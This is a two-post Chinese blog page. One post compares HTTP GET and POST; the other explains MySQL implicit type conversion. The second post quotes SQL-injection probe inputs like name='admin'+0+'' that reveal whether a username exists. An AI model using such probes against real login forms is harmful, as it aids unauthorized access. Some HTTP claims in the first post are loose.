<p>1.所谓的安全,是意味着<code>GET</code>操作是用于获取信息而非修改信息。<code>GET</code>请求一般不应该产生副作用,仅仅是资源的获取,不会修改,增加数据,不会影响资源的状态<br>2.幂等: 是一个数学或计算机学概念,常用于抽象代数。<br> 对于单目运算,如果一个运算对于范围内所有的一个数进行多次该运算,返回的结果和进行一次该运算的结果一致,那么该运算被称之为幂等,比如绝对值运算就是一个幂等运算<br> 对于双目运算,则要求当参与运算的两个值是等值的情况下,满足结果与参与运算的两个值相等,则该运算称之为运算幂等,如两个相等的数取最大值,该运算则为幂等运算</p>
<p>但在实际应用中,以上2条规定并没有这么严格。引用别人文章的例子:比如,新闻站点的头版不断更新。虽然第二次请求会返回不同的一批新闻,该操 作仍然被认为是安全的和幂等的,因为它总是返回当前的新闻。从根本上说,如果目标是当用户打开一个链接时,他可以确信从自身的角度来看没有改变资源即可。</p>
<p>根据HTTP规范,<code>POST</code>表示可能修改服务器上的资源请求。继续引用上面的例子:还是新闻以网站为例,读者对新闻发表自己的评论应该通过POST实现,因为在评论提交后站点的资源已经不同了,或者说资源被修改了。</p>
<p><strong>问题的由来:</strong></p>
<p>1.很多人贪方便,更新资源时用了GET,因为用POST必须要到FORM(表单),这样会麻烦一点。</p>
<p>2.对资源的增,删,改,查操作,其实都可以通过GET/POST完成,不需要用到PUT和DELETE。</p>
<p>3.另外一个是,早期的但是Web MVC框架设计者们并没有有意识地将URL当作抽象的资源来看待和设计 。还有一个较为严重的问题是传统的Web MVC框架基本上都只支持GET和POST两种HTTP方法,而不支持PUT和DELETE方法。</p>
<p> * 简单解释一下MVC:MVC本来是存在于Desktop程序中的,M是指数据模型,V是指用户界面,C则是控制器。使用MVC的目的是将M和V的实现代码分离,从而使同一个程序可以使用不同的表现形式。</p>
<p> 以上3点典型地描述了老一套的风格(没有严格遵守HTTP规范),随着架构的发展,现在出现REST(Representational State Transfer),一套支持HTTP规范的新风格,这里不多说了,可以参考《RESTful Web Services》。</p>
<h1>二、表现形式的区别</h1>
<p>HTTP请求的格式如下:</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><request line></span><br><span class="line"><headers></span><br><span class="line"><blank line></span><br><span class="line"><request-body></span><br></pre></td></tr></table></figure>
<p>在HTTP请求中,第一行必须为<code><request line></code>,用来说明请求类型、访问的资源、以及使用的HTTP版本,紧接着是HTTP请求头部,用来说明服务器要使用的附加信息。之后是一个空行,在此之后可以添加任意的其他数据</p>
<p><code>GET</code>请求</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">GET /xxx/?xxx=xxx&xxx=xxx HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: xxx.xxx.com</span><br><span class="line"><span class="attribute">User-Agent</span>: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6)</span><br><span class="line">Gecko/20050225 Firefox/1.0.1</span><br><span class="line"><span class="attribute">Connection</span>: Keep-Alive</span><br></pre></td></tr></table></figure>
<p><code>POST</code>请求</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">POST</span> <span class="string">/</span> HTTP/1.1</span><br><span class="line"><span class="attribute">Host</span>: xxx.xxx.com</span><br><span class="line"><span class="attribute">User-Agent</span>: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6)</span><br><span class="line">Gecko/20050225 Firefox/1.0.1</span><br><span class="line"><span class="attribute">Content-Type</span>: application/x-www-form-urlencoded</span><br><span class="line"><span class="attribute">Content-Length</span>: 40</span><br><span class="line"><span class="attribute">Connection</span>: Keep-Alive</span><br><span class="line"></span><br><span class="line">xxx=xxx&xxx=xxx</span><br></pre></td></tr></table></figure>
<p>显而易见,<code>GET</code>请求的数据是包含在URL中的,而<code>POST</code>请求时包含在HTTP Body中的</p>
<h1>三、对长度的限制</h1>
<p>对于传输数据的大小限制<br> 1.首先,HTTP协议中并没有对这两种的传输数据大小做限制,也没有对URL的长度做限制,只有大多数浏览器或者服务器对URL的长度进行了长度限制,如IE的长度限制为2048个字符,火狐浏览器则为10w个字符。<br> 2.理论上,<code>POST</code>请求不是通过URL传值,是不受数据大小限制的,但是,各个WEB服务器会规定对<code>POST</code>请求传输的数据进行不同的大小限制</p>
<h1>四、安全性</h1>
<p>在HTTP协议中,<code>GET</code>请求为什么会比<code>POST</code>请求安全呢?</p>
<p>1.这里的安全是指,一个方法的语义在本质上是只读的,不会引起服务端任何的状态变化,就是安全的无害的,而<code>POST</code>请求会去更新修改服务器端的资源,所以<code>GET</code>请求会比<code>POST</code>请求要安全。由此可得,HEAD, OPTIONS 和 TRACE 这几个方法也是安全的。</p>
<p>2.幂等,<code>GET</code>请求时幂等的,多次进行该请求和仅执行一次的结果完全相同,便是安全的,但是HTTP规范中是安全的,服务端是否能过做到幂等,这个是无法确保的。</p>
<p>仅仅是在HTTP协议中来看<code>GET</code>请求确实比<code>POST</code>请求要更加安全</p>
<p>如果是在实际应用来看的话,可见与不可见,<code>POST</code>请求还是比<code>GET</code>请求来的安全些,如:密码的传输、敏感信息的传输等等</p>
<h1>五、实际应用的区别</h1>
<table>
<thead>
<tr>
<th style="text-align:center">方法</th>
<th style="text-align:center">GET</th>
<th style="text-align:center">POST</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center">后退按钮/刷新</td>
<td style="text-align:center">无害</td>
<td style="text-align:center">数据会被重新提交(浏览器应该告知用户数据会被重新提交)</td>
</tr>
<tr>
<td style="text-align:center">书签</td>
<td style="text-align:center">可收藏为书签</td>
<td style="text-align:center">不可收藏为书签</td>
</tr>
<tr>
<td style="text-align:center">缓存</td>
<td style="text-align:center">能被缓存</td>
<td style="text-align:center">不能缓存</td>
</tr>
<tr>
<td style="text-align:center">编码类型</td>
<td style="text-align:center">application/x-www-form-urlencoded</td>
<td style="text-align:center">application/x-www-form-urlencoded 或 multipart/form-data。为二进制数据使用多重编码。</td>
</tr>
<tr>
<td style="text-align:center">历史</td>
<td style="text-align:center">参数保留在浏览器历史中</td>
<td style="text-align:center">参数不会保存在浏览器历史中</td>
</tr>
<tr>
<td style="text-align:center">对数据类型的限制</td>
<td style="text-align:center">只允许 ASCII 字符</td>
<td style="text-align:center">没有限制。也允许二进制数据</td>
</tr>
<tr>
<td style="text-align:center">安全性</td>
<td style="text-align:center">与 POST 相比,GET 的安全性较差,因为所发送的数据是 URL 的一部分。在发送密码或其他敏感信息时绝不要使用 GET</td>
<td style="text-align:center">POST 比 GET 更安全,因为参数不会被保存在浏览器历史或 web 服务器日志中</td>
</tr>
<tr>
<td style="text-align:center">可见性</td>
<td style="text-align:center">数据在 URL 中对所有人都是可见的</td>
<td style="text-align:center">数据不会显示在 URL 中</td>
</tr>
<tr>
<td style="text-align:center">对数据长度的限制</td>
<td style="text-align:center">是由浏览器和服务端来进行约束的</td>
</tr>
</tbody>
</table>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</div>
</article>
<article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
<div class="post-block">
<link itemprop="mainEntityOfPage" href="https://jaychouzzk.github.io/2019/03/24/mysql的隐式类型转换/">
<span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
<meta itemprop="name" content="Jaychouzzk">
<meta itemprop="description" content="">
<meta itemprop="image" content="/images/avatar.gif">
</span>
<span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
<meta itemprop="name" content="Jaychouzzk's blogs">
</span>
<header class="post-header">
<h1 class="post-title" itemprop="name headline">
<a class="post-title-link" href="/2019/03/24/mysql的隐式类型转换/" itemprop="url">mysql的隐式类型转换</a></h1>
<div class="post-meta">
<span class="post-time">
<span class="post-meta-item-icon">
<i class="fa fa-calendar-o"></i>
</span>
<span class="post-meta-item-text">發表於</span>
<time title="創建於" itemprop="dateCreated datePublished" datetime="2019-03-24T00:00:00+08:00">
2019-03-24
</time>
</span>
</div>
</header>
<div class="post-body" itemprop="articleBody">
<p>在小密圈中看到了一个这个问题,忽然发现自己好像也不晓得mysql数据库中有这种特性,遂记录一下</p>
<p>有位老哥提出了这样的问题,查询的时候出现了一个问题,where=1时,如图,只出现id=1的数据;当where=’1’=’’;时查询到除了id=1以外的数据。</p>
<p><img src="/img/mysql-类型转换-1.png" alt=""></p>
<p>下面有几位师傅解答了一下,<code>where id='1'=''</code>=<code>where (id='1')=''</code>,过程应该是,mysql在进行字符串与数字比较时,字符串会被mysql隐式类型转换为浮点数,所以这里<code>''</code>被转换为了<code>0</code>,最后就是<code>(id=1)=0</code>,输出结果即为id不为1的结果。</p>
<p>在Freebuf中也看到了类似的操作<a href="https://www.freebuf.com/articles/web/190019.html" target="_blank" rel="noopener">SQL注入常规Fuzz全记录</a></p>
<p><code>select * from user where name='admin'+1+'' and passwd='123456';(为false) ==>提示用户名错误</code></p>
<p><code>select * from user where name='admin'+0+'' and passwd='123456';(为true) ==>提示密码错误</code></p>
<p>于是自己测试了一下,发现了神奇的结果,在进行字符串和数字运算的时候,mysql也会进行隐式类型转换,</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql> select 'admin'='admin'+'1';</span><br><span class="line">+---------------------+</span><br><span class="line">| 'admin'='admin'+'1' |</span><br><span class="line">+---------------------+</span><br><span class="line">| 0 |</span><br><span class="line">+---------------------+</span><br><span class="line">1 row in set, 2 warnings (0.00 sec)</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">mysql> select 'admin'='admin'+'a';</span><br><span class="line">+---------------------+</span><br><span class="line">| 'admin'='admin'+'a' |</span><br><span class="line">+---------------------+</span><br><span class="line">| 1 |</span><br><span class="line">+---------------------+</span><br><span class="line">1 row in set, 3 warnings (0.00 sec)</span><br></pre></td></tr></table></figure>
<p>隐式类型转换规则:</p>
<p>·如果一个或两个参数都是NULL,比较的结果是NULL,除了NULL安全的<=>相等比较运算符。对于NULL <=> NULL,结果为true。不需要转换<br>·如果比较操作中的两个参数都是字符串,则将它们作为字符串进行比较。<br>·如果两个参数都是整数,则将它们作为整数进行比较。<br>·如果不与数字进行比较,则将十六进制值视为二进制字符串<br>·如果其中一个参数是十进制值,则比较取决于另一个参数。 如果另一个参数是十进制或整数值,则将参数与十进制值进行比较,如果另一个参数是浮点值,则将参数与浮点值进行比较<br>·如果其中一个参数是TIMESTAMP或DATETIME列,另一个参数是常量,则在执行比较之前将常量转换为时间戳。<br>·在所有其他情况下,参数都是作为浮点数(实数)比较的。</p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</div>
</article>